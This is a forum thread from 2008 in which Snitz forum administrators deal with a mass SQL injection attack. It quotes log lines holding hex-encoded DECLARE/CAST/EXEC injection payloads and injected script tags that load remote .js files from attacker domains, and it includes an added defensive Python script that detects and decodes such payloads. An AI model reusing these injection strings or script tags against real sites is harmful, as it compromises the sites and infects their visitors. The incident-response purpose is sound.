Snitz Forums 2000
 Vulnerable MOD Pages ...

T O P I C    R E V I E W
richfed Posted - 28 June 2008 : 07:10:41
At least according to my web host:

We have scanned your site for vulnerability and found the following pages which are vulnerable.

/messageboard/avatar_legend.asp

/messageboard/guestbook.asp

/messageboard/myowngoogle.asp

/messageboard/Photo_Album_view.asp

/messageboard/pop_report.asp


Hope that may help some of you out there.

PS - Not sure where the best place is to post this. Move as appropriate!!
13   L A T E S T    R E P L I E S    (Newest First)
ruirib Posted - 28 June 2008 : 15:47:55
You're welcome.
richfed Posted - 28 June 2008 : 15:42:24
Got it removed, finally. You da man, ruirib!! Thanks ...
ruirib Posted - 28 June 2008 : 14:51:47
Seems like they used several links. You will need to run the script once for each link, of course, changing the link in the script.
richfed Posted - 28 June 2008 : 14:27:40
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out????? I remove it, it just pops back in.
ruirib Posted - 28 June 2008 : 12:14:18
Do let them know that they will need to replace for the actual "infectious" link in the script, otherwise it won't have any effect.
richfed Posted - 28 June 2008 : 12:06:56
Done, ruirib. I just contacted my host once again about running that script. Thanks -
ruirib Posted - 28 June 2008 : 11:14:48
Rich, you need to fix your forum database, anyone who visits your forum is at great risk of getting virus infected. It's amazing that after a couple days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!

Please take the forum down until it is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsibility in that, too.
ruirib Posted - 28 June 2008 : 11:10:07
That was just a hack attempt. Topic.asp is secure and it has been for as long as I can remember!
richfed Posted - 28 June 2008 : 10:00:19
quote:
Originally posted by leatherlips

What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.



I wish I could answer that! I'm hoping someone can ...

Meanwhile, my host sent this:

We can see a few SQL injection attempts in the logs through the asp script topic.asp



GET /messageboard/topic.asp

topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x[hex payload omitted]%20AS%20VARCHAR(4000));EXEC(@S);--

80 - 58.187.50.43 HTTP/1.1

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -

- www.mohicanpress.com


GET /messageboard/topic.asp

whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x[hex payload omitted]%20AS%20VARCHAR(4000));EXEC(@S);--

80 - 200.90.76.104


GET /messageboard/topic.asp

TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x[hex payload omitted]%20AS%20VARCHAR(4000));EXEC(@S);--

80 - 190.39.125.85 HTTP/1.1

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -

- www.mohicanpress.com


These are found in the logs just before the first entry of the given pattern.

The SQL statements are encoded as hexadecimal code (starting from: SET%20@S=CAST( ). You can try to decode it using any online tool which converts hexadecimal to string.


If someone could make English out of this, there are probably a few here who would be most grateful!!
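Added example (not part of any post in this thread): a defender-side triage helper for the log pattern the host describes above, where a query string declares a variable, sets it from a CAST of a 0x hex literal and passes it to EXEC. It finds matching query strings and decodes the hex into readable text for review. The function names, the sample query strings and the harmless "SELECT 1" payload are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample query strings (not copied from the thread's logs).
# The hex literal below encodes the harmless statement "SELECT 1".
BENIGN_HEX = "SELECT 1".encode("ascii").hex().upper()
SAMPLE_QUERIES = [
    "TOPIC_ID=4035",
    "TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + BENIGN_HEX + "%20AS%20VARCHAR(4000));EXEC(@S);--",
    "whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246",
]

# DECLARE @x ... SET @x = CAST(0x<hex> AS [N]VARCHAR(...)) ... EXEC(@x)
PATTERN = re.compile(
    r"DECLARE\s+@(\w+)\s.*?SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9A-F]+)\s+AS\s+"
    r"(N?)VARCHAR.*?EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

def decode_payload(hex_text, wide):
    """Turn the 0x literal back into text for reading only; never execute it."""
    if len(hex_text) % 2:
        hex_text = hex_text[:-1]  # truncated log line: drop the dangling nibble
    raw = bytes.fromhex(hex_text)
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace")

def triage(query_string):
    """Return the decoded SQL if the query string carries the pattern, else None."""
    decoded = unquote(query_string.replace("+", " "))  # logs use + or %20 for spaces
    match = PATTERN.search(decoded)
    if not match:
        return None
    return decode_payload(match.group(2), wide=bool(match.group(3)))

def scan(queries):
    """Map the index of each suspicious query string to its decoded payload."""
    hits = {}
    for index, query in enumerate(queries):
        sql = triage(query)
        if sql is not None:
            hits[index] = sql
    return hits

if __name__ == "__main__":
    for index, sql in scan(SAMPLE_QUERIES).items():
        print(f"query {index}: hex-encoded SQL decodes to: {sql!r}")
```

A hit only shows that the request was attempted; whether it succeeded depends on how the page handles the parameter.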
SiSL Posted - 28 June 2008 : 09:01:20
There are some SQL Injection checkers for hosts, that might be possible checking queries...
HuwR Posted - 28 June 2008 : 08:52:31
I would be interested in why your host thinks all those files are vulnerable, I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.

If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual successful attempt.

Obviously if they have some better evidence then fair enough.
modifichicci Posted - 28 June 2008 : 08:08:24
I think in Photo_album_view we have to sanitize these variables:
strPhotoName = trim(request.QueryString("PhotoName"))
strDescription = trim(request.QueryString("Description"))
strPhotoSearch = trim(request.QueryString("Photo_Search"))

I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so I don't know if a sqlstring is enough or not.
There is a validate input function in inc photo functions but at this moment I don't know how to use it..
leatherlips Posted - 28 June 2008 : 07:29:08
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.
